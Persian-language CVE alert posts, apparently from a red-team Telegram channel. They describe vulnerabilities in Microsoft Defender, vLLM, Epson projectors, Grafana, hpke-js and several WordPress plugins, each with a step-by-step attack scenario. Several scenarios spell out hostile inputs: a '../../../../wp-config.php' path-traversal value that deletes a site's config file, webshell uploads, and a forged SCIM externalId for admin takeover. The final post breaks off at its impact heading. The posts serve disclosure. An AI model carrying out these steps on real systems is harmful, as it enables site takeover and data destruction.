🚨 New Vulnerability Alert: CVE-2025-62459

🟠 Risk Level: HIGH (Score: 8.3)

تحلیل خلاصه آسیب‌پذیری | CVE-2025-62459

---

📄 شرح آسیب‌پذیری:
این آسیب‌پذیری با شناسه CVE-2025-62459 به عنوان آسیب‌پذیری جعل (Spoofing) در پورتال Microsoft Defender شناسایی شده است. این نقص امنیتی به مهاجم اجازه می‌دهد تا یک لینک دستکاری‌شده ایجاد کند که در ظاهر متعلق به دامنه معتبر و رسمی پورتال امنیتی مایکروسافت (security.microsoft.com) است. اما در واقعیت، زمانی که کاربر روی این لینک کلیک می‌کند، به یک وب‌سایت مخرب که تحت کنترل کامل مهاجم قرار دارد، هدایت می‌شود. این تکنیک باعث می‌شود تشخیص لینک مخرب از لینک واقعی برای کاربر بسیار دشوار گردد.

⚠️ پیامدها:
موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به حملات فیشینگ بسیار قانع‌کننده شود. پیامدهای اصلی شامل موارد زیر است:
- سرقت اطلاعات اعتباری: مهاجم می‌تواند با ساخت یک صفحه لاگین جعلی، نام کاربری و رمز عبور مدیران امنیتی یا کارمندان سازمان را به سرقت ببرد.
- توزیع بدافزار: وب‌سایت مخرب می‌تواند به عنوان بستری برای توزیع بدافزار، باج‌افزار یا سایر نرم‌افزارهای جاسوسی عمل کند.
- از بین بردن اعتماد: این حملات می‌توانند اعتماد کاربران به هشدارهای امنیتی و ارتباطات رسمی از سوی مایکروسافت را تضعیف کنند.

🎣 سناریوی حمله:
۱. مهاجم یک ایمیل فیشینگ با ظاهری کاملاً رسمی طراحی می‌کند و آن را به عنوان یک "هشدار امنیتی فوری از طرف Microsoft Defender" برای کارمندان یک سازمان ارسال می‌کند.

۲. در متن ایمیل، یک لینک با عنوان "بررسی فعالیت مشکوک" قرار داده شده است. کاربر با نگه داشتن ماوس روی لینک، آدرسی را مشاهده می‌کند که به نظر کاملاً معتبر و متعلق به security.microsoft.com است.

۳. کاربر فریب خورده و روی لینک کلیک می‌کند. بلافاصله به یک صفحه وب کاملاً مشابه با صفحه ورود به پورتال Microsoft Defender هدایت می‌شود که در واقع توسط مهاجم کنترل می‌شود.

۴. قربانی بدون اطلاع از جعلی بودن صفحه، اطلاعات کاربری خود (نام کاربری و رمز عبور) را وارد می‌کند.

۵. به محض ورود اطلاعات، این اطلاعات برای مهاجم ارسال می‌شود و او اکنون به حساب کاربری و داده‌های حساس سازمان دسترسی پیدا می‌کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-64655

🟠 Risk Level: HIGH (Score: 8.8)

شرح آسیب‌پذیری:

یک آسیب‌پذیری امنیتی با شناسه CVE-2025-64655 در مؤلفه Dynamics OmniChannel SDK Storage Containers شناسایی شده است. این نقص ناشی از عدم بررسی صحیح و کامل مجوزها (Improper Authorization) می‌باشد.

در این حالت، سیستم به درستی سطح دسترسی کاربر درخواست‌دهنده را برای انجام یک عملیات خاص اعتبارسنجی نمی‌کند. این ضعف به یک مهاجم غیرمجاز که به شبکه دسترسی دارد، اجازه می‌دهد تا با ارسال درخواست‌های دستکاری‌شده، محدودیت‌های امنیتی را دور زده و به منابعی فراتر از سطح دسترسی مجاز خود دست یابد.

تأثیر:

مهم‌ترین و خطرناک‌ترین تأثیر این آسیب‌پذیری، افزایش سطح دسترسی (Privilege Escalation) است. یک مهاجم موفق می‌تواند با بهره‌برداری از این نقص، دسترسی‌های خود را از یک کاربر عادی یا غیرمجاز به سطح یک کاربر با اختیارات بالا (مانند ادمین) ارتقا دهد.

پیامدهای این حمله می‌تواند شامل موارد زیر باشد:
- دسترسی، تغییر یا حذف داده‌های حساس مشتریان که در Storage Containerها ذخیره شده‌اند.
- اجرای دستورات غیرمجاز بر روی سیستم از راه دور.
- ایجاد اختلال در سرویس‌دهی و به خطر انداختن پایداری پلتفرم.

سناریو:

در یک سناریوی محتمل، یک مهاجم با سطح دسترسی پایین (یا حتی بدون احراز هویت) یک درخواست API دستکاری‌شده را به سمت نقطه پایانی (Endpoint) مربوط به Storage Containers در OmniChannel SDK ارسال می‌کند.

به دلیل وجود نقص در منطق بررسی مجوزها، سیستم قادر به تشخیص نیت مخرب و سطح دسترسی واقعی مهاجم نیست و درخواست را پردازش می‌کند. در نتیجه، مهاجم موفق می‌شود عملیاتی را انجام دهد که تنها برای یک کاربر با دسترسی مدیریتی مجاز است؛ برای مثال، خواندن اطلاعات محرمانه از یک کانتینر ذخیره‌سازی محافظت‌شده یا تغییر تنظیمات پیکربندی آن.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-62164

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری CVE-2025-62164 در vLLM

توضیحات آسیب‌پذیری:
یک آسیب‌پذیری از نوع خرابی حافظه (Memory Corruption) با شناسه CVE-2025-62164 در vLLM، که یک موتور محبوب برای استنتاج و ارائه سرویس مدل‌های زبان بزرگ (LLM) است، شناسایی شده است. نسخه‌های تحت تأثیر از 0.10.2 تا قبل از نسخه 0.11.1 می‌باشند.

این آسیب‌پذیری در اندپوینت API مربوط به Completions وجود دارد. مشکل اصلی از آنجا ناشی می‌شود که این اندپوینت هنگام پردازش эмбедینگ‌های ورودی ارسالی توسط کاربر، تنسورهای سریالایز شده را با استفاده از تابع torch.load() بدون اعتبارسنجی کافی بارگذاری می‌کند. با توجه به تغییری که در نسخه PyTorch 2.8.0 معرفی شد، بررسی‌های یکپارچگی برای تنسورهای اسپارس (sparse) به طور پیش‌فرض غیرفعال است. در نتیجه، یک مهاجم می‌تواند با ارسال یک تنسور دستکاری‌شده و مخرب، بررسی‌های مرزی داخلی را دور زده و در حین فراخوانی تابع to_dense()، باعث نوشتن داده خارج از محدوده مجاز در حافظه (out-of-bounds memory write) شود.

تأثیر:
این آسیب‌پذیری می‌تواند دو پیامد اصلی داشته باشد:

۱. از کار افتادن سرویس (Denial-of-Service): ساده‌ترین نتیجه بهره‌برداری از این باگ، کرش کردن فوری فرآیند vLLM به دلیل خرابی حافظه است. این امر منجر به قطع دسترسی تمامی کاربران به سرویس مدل زبان می‌شود.

۲. اجرای کد از راه دور (Remote Code Execution): در سناریوهای پیچیده‌تر، یک مهاجم حرفه‌ای ممکن است بتواند با کنترل دقیق داده‌ها و محل نوشتن آن‌ها در حافظه، کنترل اجرای برنامه را به دست گرفته و کدهای دلخواه خود را بر روی سرور میزبان vLLM اجرا کند. این سناریو دارای بالاترین سطح بحرانی است.

سناریو:
یک مهاجم یک تنسور اسپارس (sparse tensor) مخرب را به گونه‌ای طراحی می‌کند که ساختار داخلی آن هنگام تبدیل شدن به یک تنسور متراکم (dense tensor)، باعث سرریز بافر شود.

سپس، مهاجم این تنسور دستکاری‌شده را به عنوان بخشی از یک درخواست قانونی به اندپوینت Completions در یک سرور vLLM که از نسخه آسیب‌پذیر استفاده می‌کند، ارسال می‌نماید.

سرور vLLM درخواست را دریافت کرده و بدون اعتبارسنجی کافی، تنسور مخرب را با استفاده از torch.load() بارگذاری می‌کند. به دلیل غیرفعال بودن بررسی‌های امنیتی در نسخه مربوطه PyTorch، ساختار نامعتبر تنسور شناسایی نمی‌شود.

در مرحله پردازش، هنگامی که تابع to_dense() فراخوانی می‌شود، تلاش برای نوشتن داده‌ها در حافظه فراتر از مرزهای تخصیص‌داده‌شده صورت می‌گیرد. این عمل باعث خرابی حافظه شده و بسته به مهارت مهاجم، یا به کرش کردن سرویس (DoS) و یا به اجرای کد از راه دور (RCE) منجر می‌شود.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-64310

🔴 Risk Level: CRITICAL (Score: 9.8)

📝 شرح آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-64310 به پنل مدیریت تحت وب پروژکتورهای شرکت SEIKO EPSON با نام‌های EPSON WebConfig و Epson Web Control مربوط می‌شود. این ضعف امنیتی به دلیل عدم وجود هرگونه مکانیزم محدودکننده برای تلاش‌های ناموفق ورود به سیستم (Rate Limiting) به وجود آمده است.

در نتیجه، یک مهاجم می‌تواند بدون هیچ محدودیتی، تعداد نامحدودی از رمزهای عبور را برای حساب کاربری مدیر (Administrator) امتحان کند. سیستم هیچ‌گاه پس از تعداد مشخصی تلاش ناموفق، دسترسی مهاجم را مسدود یا کند نمی‌کند و این شرایط را برای اجرای حملات Brute Force (جستجوی فراگیر) ایده‌آل می‌سازد.


💥 تاثیرات و پیامدها:

موفقیت در بهره‌برداری از این آسیب‌پذیری، منجر به دستیابی کامل و غیرمجاز مهاجم به پنل مدیریت پروژکتور با سطح دسترسی مدیر کل (Administrator) می‌شود. پیامدهای اصلی این دسترسی عبارتند از:

- کنترل کامل دستگاه: تغییر تمامی تنظیمات پروژکتور، از جمله تنظیمات شبکه، نمایش، و خاموش/روشن کردن دستگاه از راه دور.
- ایجاد اختلال: مهاجم می‌تواند در جلسات مهم (مانند کنفرانس‌ها یا کلاس‌های درس) با خاموش کردن پروژکتور یا تغییر محتوای در حال نمایش، اختلال ایجاد کند.
- نقطه نفوذ به شبکه داخلی (Pivoting): در محیط‌های سازمانی، مهاجم می‌تواند از پروژکتور هک‌شده به عنوان یک نقطه برای شناسایی و حمله به سایر دستگاه‌های موجود در همان شبکه داخلی استفاده کند.
- سرقت اطلاعات: امکان مشاهده و سرقت اطلاعات حساس پیکربندی‌شده روی دستگاه، مانند اطلاعات مربوط به شبکه (Wi-Fi Credentials) وجود دارد.


🎭 سناریوی حمله:

یک مهاجم با شناسایی یک پروژکتور اپسون آسیب‌پذیر در شبکه (برای مثال از طریق اسکن پورت‌ها)، به صفحه ورود پنل وب آن دسترسی پیدا می‌کند.

مهاجم با علم به اینکه نام کاربری مدیر به احتمال زیاد admin یا موارد مشابه است، یک ابزار خودکار اجرای حمله Brute Force را با یک لیست بزرگ از رمزهای عبور رایج (Wordlist) تنظیم می‌کند.

از آنجایی که سیستم هیچ دفاعی در برابر تلاش‌های مکرر ندارد، ابزار مهاجم به صورت مداوم و با سرعت بالا رمزهای عبور مختلف را تست می‌کند تا در نهایت رمز صحیح را پیدا کند. پس از یافتن رمز، مهاجم با دسترسی کامل وارد پنل مدیریتی شده و کنترل دستگاه را به دست می‌گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-11456

🔴 Risk Level: CRITICAL (Score: 9.8)

تحلیل آسیب‌پذیری حیاتی در پلاگین وردپرس
CVE-2025-11456

آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-11456 از نوع آپلود فایل دلخواه (Arbitrary File Upload) در پلاگین ELEX WordPress HelpDesk & Customer Ticketing System برای وردپرس شناسایی شده است.

این ضعف امنیتی در تمام نسخه‌های 3.3.1 و پایین‌تر وجود دارد. مشکل اصلی به دلیل عدم اعتبارسنجی صحیح نوع فایل در تابع eh_crm_new_ticket_post() است که به مهاجمان احرازهویت‌نشده اجازه می‌دهد تا هر نوع فایلی را بر روی سرور آپلود کنند.

تأثیر:
بالاترین سطح تأثیر این آسیب‌پذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این به معنای آن است که مهاجم می‌تواند کنترل کامل وب‌سایت و به طور بالقوه کل سرور را به دست آورد.

سایر پیامدهای احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- نصب وب‌شل (Web Shell) و بدافزار
- تغییر چهره وب‌سایت (Defacement)
- استفاده از سرور برای حملات بیشتر به دیگر سیستم‌ها

سناریو:
یک مهاجم، وب‌سایتی را که از نسخه آسیب‌پذیر پلاگین ELEX HelpDesk استفاده می‌کند، شناسایی می‌کند.

مهاجم با استفاده از فرم ایجاد تیکت پشتیبانی جدید (که برای کاربران مهمان نیز در دسترس است)، به جای یک فایل ضمیمه مجاز مانند تصویر یا سند، یک فایل مخرب با پسوند .php (یک وب‌شل) را آپلود می‌کند.

به دلیل وجود آسیب‌پذیری، پلاگین نوع فایل را بررسی نکرده و فایل shell.php را با موفقیت روی سرور ذخیره می‌کند.

مهاجم سپس مسیر فایل آپلود شده را پیدا کرده و با فراخوانی مستقیم آن از طریق مرورگر، وب‌شل را فعال می‌کند. از این لحظه به بعد، مهاجم قادر است دستورات دلخواه خود را روی سرور اجرا کرده و کنترل کامل آن را در دست بگیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-11985

🟠 Risk Level: HIGH (Score: 8.8)

⚠️ شرح آسیب‌پذیری:

یک آسیب‌پذیری حیاتی با شناسه CVE-2025-11985 در افزونه Realty Portal برای وردپرس شناسایی شده است. این آسیب‌پذیری نسخه‌های 0.1 تا 0.4.1 را تحت تأثیر قرار می‌دهد.

نقص اصلی به دلیل عدم بررسی صحیح سطح دسترسی (Missing Capability Check) در تابع rp_save_property_settings است. این ضعف به یک مهاجم احرازهویت‌شده، حتی با کمترین سطح دسترسی مانند "مشترک" (Subscriber)، اجازه می‌دهد تا تنظیمات کلیدی و دلخواه وردپرس را تغییر دهد و در نهایت سطح دسترسی خود را افزایش دهد.

💥 تأثیر:

موفقیت‌آمیز بودن این حمله به مهاجم اجازه می‌دهد تا کنترل کامل وب‌سایت را به دست آورد. مهاجم می‌تواند با تغییر نقش کاربری پیش‌فرض هنگام ثبت‌نام به "مدیر کل" (Administrator)، یک حساب کاربری جدید با بالاترین سطح دسترسی برای خود ایجاد کند.

این امر منجر به عواقب شدیدی مانند سرقت اطلاعات حساس، تغییر محتوای سایت، بارگذاری کدهای مخرب (Backdoor) و آسیب جدی به اعتبار وب‌سایت می‌شود.

🎯 سناریو حمله:

۱. مهاجم با یک حساب کاربری با سطح دسترسی پایین (مثلاً Subscriber) وارد سایت می‌شود.

۲. مهاجم درخواست دستکاری‌شده‌ای را به تابع آسیب‌پذیر rp_save_property_settings ارسال می‌کند تا مقدار گزینه default_role را به administrator تغییر دهد.

۳. در صورت لزوم، مهاجم گزینه مربوط به فعال‌سازی ثبت‌نام عمومی کاربران (users_can_register) را نیز فعال می‌کند.

۴. مهاجم به صفحه ثبت‌نام سایت مراجعه کرده و یک حساب کاربری جدید ایجاد می‌کند.

۵. به دلیل تغییرات اعمال‌شده در مرحله ۲، حساب کاربری جدید به صورت خودکار با دسترسی کامل "مدیر کل" ساخته می‌شود و مهاجم کنترل سایت را به طور کامل در دست می‌گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-12138

🟠 Risk Level: HIGH (Score: 8.8)

📄 توضیحات آسیب‌پذیری:

آسیب‌پذیری با شناسه CVE-2025-12138 در افزونه وردپرس URL Image Importer در تمام نسخه‌های 1.0.6 و قدیمی‌تر شناسایی شده است. این آسیب‌پذیری از نوع «آپلود فایل دلخواه» (Arbitrary File Upload) است.

مشکل اصلی در تابع uimptr_import_image_from_url() نهفته است. این تابع برای اعتبارسنجی نوع فایل، به هدر Content-Type که توسط کاربر قابل کنترل است، اعتماد می‌کند. به عبارت دیگر، افزونه فایل را قبل از بررسی دقیق و صحیح نوع آن روی سرور ذخیره می‌کند. این نقص به مهاجم اجازه می‌دهد تا با ارسال یک هدر جعلی، فایل‌های مخرب را به جای تصویر در سرور آپلود کند.

💥 تاثیرات:

مهم‌ترین و خطرناک‌ترین پیامد این آسیب‌پذیری، امکان «اجرای کد از راه دور» (Remote Code Execution) است.

مهاجمی که با موفقیت از این ضعف امنیتی سوءاستفاده کند، می‌تواند یک فایل با پسوند .php (وب‌شِل) روی سرور آپلود کرده و از طریق آن به اهداف زیر دست یابد:
- کنترل کامل بر روی وب‌سایت آسیب‌دیده.
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایل‌های پیکربندی.
- تغییر چهره (Defacement) وب‌سایت.
- استفاده از سرور قربانی برای انجام حملات دیگر.

🎭 سناریوی حمله:

یک مهاجم با داشتن حساب کاربری در سطح دسترسی «نویسنده» (Author) یا بالاتر می‌تواند سناریوی زیر را پیاده‌سازی کند:

۱. مهاجم وارد پنل مدیریت وردپرس می‌شود.

۲. از قابلیت افزونه برای «وارد کردن تصویر از طریق URL» استفاده می‌کند.

۳. به جای آدرس یک تصویر واقعی، آدرس یک فایل PHP مخرب (مثلاً یک وب‌شِل) که روی سرور خودش قرار دارد را وارد می‌کند.

۴. مهاجم درخواست ارسالی به سرور را رهگیری کرده و هدر Content-Type آن را به یک نوع فایل تصویری مجاز مانند image/jpeg تغییر می‌دهد.

۵. تابع آسیب‌پذیر در افزونه، هدر جعلی را بررسی کرده و فریب می‌خورد. در نتیجه، فایل .php مخرب را روی سرور آپلود می‌کند.

۶. در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده از طریق مرورگر، کد مخرب خود را اجرا کرده و کنترل سرور را در دست می‌گیرد.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13322

🟠 Risk Level: HIGH (Score: 8.1)

📄 توضیحات آسیب‌پذیری:
یک آسیب‌پذیری حیاتی از نوع "حذف فایل دلخواه" (Arbitrary File Deletion) با شناسه CVE-2025-13322 در افزونه WP AUDIO GALLERY برای وردپرس شناسایی شده است. این آسیب‌پذیری تمامی نسخه‌های این افزونه تا نسخه 2.0 (و خود این نسخه) را تحت تأثیر قرار می‌دهد.

منشأ این ضعف امنیتی در تابع ای‌جکس (AJAX) به نام wpag_uploadaudio_callback() نهفته است. این تابع، مسیر فایل ارسالی توسط کاربر در پارامتر audio_upload را بدون اعتبارسنجی کافی، مستقیماً به تابع unlink() در PHP ارسال می‌کند. این نقص به یک مهاجم احرازهویت‌شده (حتی با سطح دسترسی پایین مانند Subscriber) اجازه می‌دهد تا با دستکاری مسیر فایل، هر فایل دلخواهی را بر روی سرور حذف نماید.

💥 تأثیرات:
تأثیر اصلی این آسیب‌پذیری، قابلیت حذف فایل‌های دلخواه بر روی سرور میزبان است. این موضوع به تنهایی می‌تواند منجر به از کار افتادن وب‌سایت (Denial of Service) از طریق حذف فایل‌های هسته وردپرس، قالب یا سایر افزونه‌ها شود.

با این حال، خطر اصلی زمانی رخ می‌دهد که مهاجم فایل‌های حیاتی مانند wp-config.php را حذف کند. حذف این فایل، وردپرس را به مرحله نصب مجدد بازمی‌گرداند. مهاجم می‌تواند با شروع فرآیند نصب و اتصال به پایگاه داده موجود، کنترل کامل وب‌سایت را به دست گرفته و در نهایت به اجرای کد از راه دور (Remote Code Execution) دست یابد.

🕵️‍♂️ سناریوی حمله:
یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. مهاجم با یک حساب کاربری با سطح دسترسی Subscriber وارد وب‌سایت وردپرسی می‌شود.

۲. مهاجم یک درخواست مخرب به نقطه پایانی AJAX که توسط تابع wpag_uploadaudio_callback() مدیریت می‌شود، ارسال می‌کند.

۳. در این درخواست، پارامتر audio_upload با مسیری دستکاری‌شده برای هدف قرار دادن یک فایل حیاتی تنظیم می‌شود. برای مثال: ../../../../wp-config.php

۴. سرور درخواست را پردازش کرده و به دلیل عدم اعتبارسنجی، فایل wp-config.php را با موفقیت حذف می‌کند.

۵. اکنون وب‌سایت بدون فایل پیکربندی است. مهاجم به صفحه اصلی سایت مراجعه کرده و با صفحه نصب وردپرس مواجه می‌شود. او فرآیند نصب را با استفاده از اطلاعات پایگاه داده موجود تکمیل کرده، یک حساب کاربری مدیر جدید برای خود ایجاد می‌کند و کنترل کامل سایت را به دست می‌گیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-13156

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل و بررسی آسیب‌پذیری | CVE-2025-13156

گزارش حرفه‌ای تحلیل آسیب‌پذیری در افزونه وردپرس Vitepos – Point of Sale (POS) for WooCommerce


Vulnerability Description:
آسیب‌پذیری با شناسه CVE-2025-13156 از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه Vitepos – Point of Sale (POS) for WooCommerce برای وردپرس شناسایی شده است. این ضعف امنیتی در تمام نسخه‌ها تا نسخه 3.3.0 (شامل خود این نسخه) وجود دارد.

ریشه مشکل در عدم اعتبارسنجی نوع فایل در تابع insert_media_attachment() است. به طور مشخص، تابع save_update_category_img() هنگام پردازش تصاویر دسته‌بندی، نوع فایل ارسالی توسط کاربر را بدون هیچ‌گونه بررسی و اعتبارسنجی می‌پذیرد. این نقص به مهاجمان احرازهویت‌شده، حتی با کمترین سطح دسترسی مانند مشترک (Subscriber)، اجازه می‌دهد تا فایل‌های دلخواه خود را بر روی سرور سایت آسیب‌دیده آپلود کنند.


Impact:
تأثیر اصلی این آسیب‌پذیری بسیار بالا و حیاتی است و به اجرای کد از راه دور (Remote Code Execution - RCE) منجر می‌شود.

مهاجم با بهره‌برداری از این ضعف امنیتی، می‌تواند یک فایل مخرب (مانند یک وب‌شل با پسوند .php) را بر روی سرور آپلود کرده و سپس آن را اجرا کند. این امر به مهاجم امکان کنترل کامل بر روی وب‌سایت و سرور را می‌دهد. پیامدهای احتمالی شامل موارد زیر است:

- سرقت اطلاعات حساس کاربران، سفارشات و داده‌های مالی
- تخریب کامل وب‌سایت و از دسترس خارج کردن آن
- استفاده از سرور برای حملات دیگر مانند حملات DDoS یا استخراج ارز دیجیتال
- نفوذ به شبکه‌های داخلی متصل به سرور


Scenario:
یک سناریوی محتمل برای بهره‌برداری از این آسیب‌پذیری به شرح زیر است:

۱. مهاجم یک حساب کاربری با سطح دسترسی پایین، مانند «مشترک»، در وب‌سایت وردپرسی که از نسخه آسیب‌پذیر افزونه Vitepos استفاده می‌کند، ثبت‌نام می‌کند.

۲. سپس، مهاجم از قابلیتی در افزونه که به آپلود تصویر برای دسته‌بندی‌ها مربوط می‌شود، استفاده می‌کند.

۳. به جای یک فایل تصویر استاندارد (مانند .jpg یا .png)، مهاجم یک فایل مخرب به نام backdoor.php که حاوی کدهای یک وب‌شل است، آپلود می‌کند.

۴. به دلیل نبود اعتبارسنجی نوع فایل، سیستم فایل .php را بدون مشکل می‌پذیرد و آن را در یکی از پوشه‌های قابل دسترس وب‌سایت (مانند پوشه uploads) ذخیره می‌کند.

۵. در نهایت، مهاجم با وارد کردن آدرس مستقیم فایل آپلود شده (برای مثال: https://example.com/wp-content/uploads/2024/05/backdoor.php) در مرورگر خود، کدهای مخرب را بر روی سرور اجرا می‌کند. این کار به او یک رابط کاربری برای اجرای دستورات دلخواه بر روی سرور داده و کنترل کامل آن را در اختیارش قرار می‌دهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-41115

🔴 Risk Level: CRITICAL (Score: 10.0)

تحلیل آسیب‌پذیری CVE-2025-41115 در Grafana

این گزارش یک تحلیل فنی از آسیب‌پذیری مهم در نسخه‌های سازمانی (Enterprise) و ابری (Cloud) پلتفرم Grafana ارائه می‌دهد.

---

🛡️ شرح آسیب‌پذیری:

یک آسیب‌پذیری در مکانیزم مدیریت هویت کاربران در نسخه‌های 12.x پلتفرم Grafana شناسایی شده است. این ضعف امنیتی به قابلیت SCIM (System for Cross-domain Identity Management) مرتبط است که برای خودکارسازی مدیریت چرخه حیات کاربران در سازمان‌ها استفاده می‌شود.

اگر یک کلاینت SCIM مخرب یا در معرض خطر، کاربری را با یک شناسه خارجی عددی (externalId) ایجاد کند، Grafana به اشتباه این شناسه خارجی را با شناسه‌های کاربری داخلی (که آن‌ها نیز عددی هستند) انطباق می‌دهد. این تداخل به مهاجم اجازه می‌دهد تا یک حساب کاربری داخلی موجود را بازنویسی (Override) کند.

توجه: این آسیب‌پذیری تنها در صورتی قابل بهره‌برداری است که هر دو شرط زیر در پیکربندی Grafana برقرار باشند:
۱. قابلیت enableSCIM فعال باشد (true).
۲. گزینه user_sync_enabled در بخش [auth.scim] فعال باشد (true).

💣 تأثیرات:

موفقیت در بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به عواقب جدی امنیتی شود:

- جعل هویت (Impersonation): مهاجم می‌تواند هویت هر کاربری در سیستم، از جمله مدیران کل (Administrators)، را جعل کرده و به تمام داشبوردها، داده‌ها و تنظیمات آن کاربر دسترسی پیدا کند.

- افزایش سطح دسترسی (Privilege Escalation): با هدف قرار دادن یک حساب کاربری با دسترسی بالا، مهاجم می‌تواند سطح دسترسی خود را در سیستم به بالاترین حد ممکن ارتقا دهد.

- دسترسی غیرمجاز و دستکاری داده‌ها: مهاجم به منابع حساس دسترسی پیدا کرده و قادر به مشاهده، تغییر یا حذف داده‌های حیاتی سازمان خواهد بود.

🎭 سناریوی حمله:

یک سناریوی حمله محتمل می‌تواند به شکل زیر باشد:

۱. مهاجم کنترل یک کلاینت SCIM متصل به Grafana را به دست می‌آورد یا به عنوان یک کلاینت مخرب عمل می‌کند.

۲. مهاجم شناسه داخلی (User ID) یک کاربر با دسترسی بالا، برای مثال مدیر سیستم با شناسه 1، را شناسایی می‌کند.

۳. مهاجم یک درخواست از طریق پروتکل SCIM برای ایجاد یک کاربر جدید به Grafana ارسال می‌کند.

۴. در این درخواست، مقدار فیلد externalId برای کاربر جدید را برابر با شناسه عددی کاربر هدف قرار می‌دهد (مثلاً: "externalId": "1").

۵. به دلیل وجود آسیب‌پذیری، Grafana این شناسه خارجی عددی را با شناسه داخلی موجود یکسان تلقی کرده و حساب کاربری مهاجم را به حساب مدیر سیستم با شناسه 1 متصل می‌کند.

۶. در نتیجه، مهاجم به طور کامل کنترل حساب مدیر را در دست گرفته و به تمام اختیارات و دسترسی‌های او دست می‌یابد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-64767

🔴 Risk Level: CRITICAL (Score: 9.1)

گزارش تحلیل آسیب‌پذیری: CVE-2025-64767
ماژول: hpke-js

---

🐛 شرح آسیب‌پذیری:
ماژول hpke-js یک کتابخانه جاوااسکریپت برای پیاده‌سازی رمزنگاری کلید عمومی ترکیبی (HPKE) بر بستر Web Cryptography API است. در نسخه‌های پیش از 1.7.5، یک آسیب‌پذیری از نوع "وضعیت رقابتی" (Race Condition) در تابع عمومی SenderContext Seal() وجود دارد.

این ضعف امنیتی به مهاجم اجازه می‌دهد تا در شرایط خاص، سیستم را وادار به استفاده مجدد از یک nonce (عدد یکبار مصرف) یکسان برای رمزنگاری چندین پیام متفاوت کند. استفاده مجدد از nonce یکی از اشتباهات حیاتی در پیاده‌سازی الگوریتم‌های رمزنگاری متقارن مانند AEAD است.

⚠️ تاثیر:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به از بین رفتن کامل محرمانگی (Confidentiality) و یکپارچگی (Integrity) پیام‌های رمزنگاری شده شود.

در عمل، این بدان معناست که یک مهاجم قادر خواهد بود:
- پیام‌های رمزنگاری شده را رمزگشایی کرده و به محتوای آن‌ها دسترسی پیدا کند.
- محتوای پیام‌ها را بدون شناسایی شدن، تغییر دهد.

📋 سناریو:
یک مهاجم که قادر به مشاهده ترافیک رمزنگاری شده بین کاربر و سرور است، شرایطی را ایجاد می‌کند که در آن برنامه کلاینت مجبور شود دو یا چند پیام را به صورت تقریباً همزمان با استفاده از تابع Seal() ارسال کند. به دلیل وجود "وضعیت رقابتی"، ماژول hpke-js برای هر دو پیام از یک nonce یکسان استفاده می‌کند.

این استفاده مجدد، یک ضعف کشنده در رمزنگاری ایجاد کرده و به مهاجم اجازه می‌دهد تا با تحلیل ریاضیاتی دو پیام رمزنگاری شده، کلید رمز را شکسته و محتوای هر دو پیام را به طور کامل بخواند.

🛡️ توصیه امنیتی:
به تمام توسعه‌دهندگانی که از کتابخانه hpke-js استفاده می‌کنند، اکیداً توصیه می‌شود که نسخه مورد استفاده خود را فوراً به نسخه 1.7.5 یا بالاتر ارتقا دهند تا این آسیب‌پذیری حیاتی برطرف گردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal

🚨 New Vulnerability Alert: CVE-2025-11087

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری | CVE-2025-11087

---

شرح آسیب‌پذیری:
آسیب‌پذیری با شناسه CVE-2025-11087 در افزونه Zegen Core برای وردپرس شناسایی شده است. این ضعف امنیتی در نسخه‌های 2.0.1 و پایین‌تر وجود دارد.

این آسیب‌پذیری از نوع جعل درخواست میان‌وب‌گاهی (CSRF) است که منجر به آپلود فایل دلخواه (Arbitrary File Upload) می‌شود.

علت اصلی این مشکل، عدم وجود اعتبارسنجی توکن امنیتی (Nonce) برای جلوگیری از حملات CSRF و همچنین عدم بررسی نوع فایل آپلود شده در مسیر /custom-font-code/custom-fonts-uploads.php می‌باشد. این ترکیب به مهاجم اجازه می‌دهد تا بدون احراز هویت مستقیم، عملیات آپلود فایل را از طرف یک مدیر معتبر انجام دهد.

---

تاثیرات:
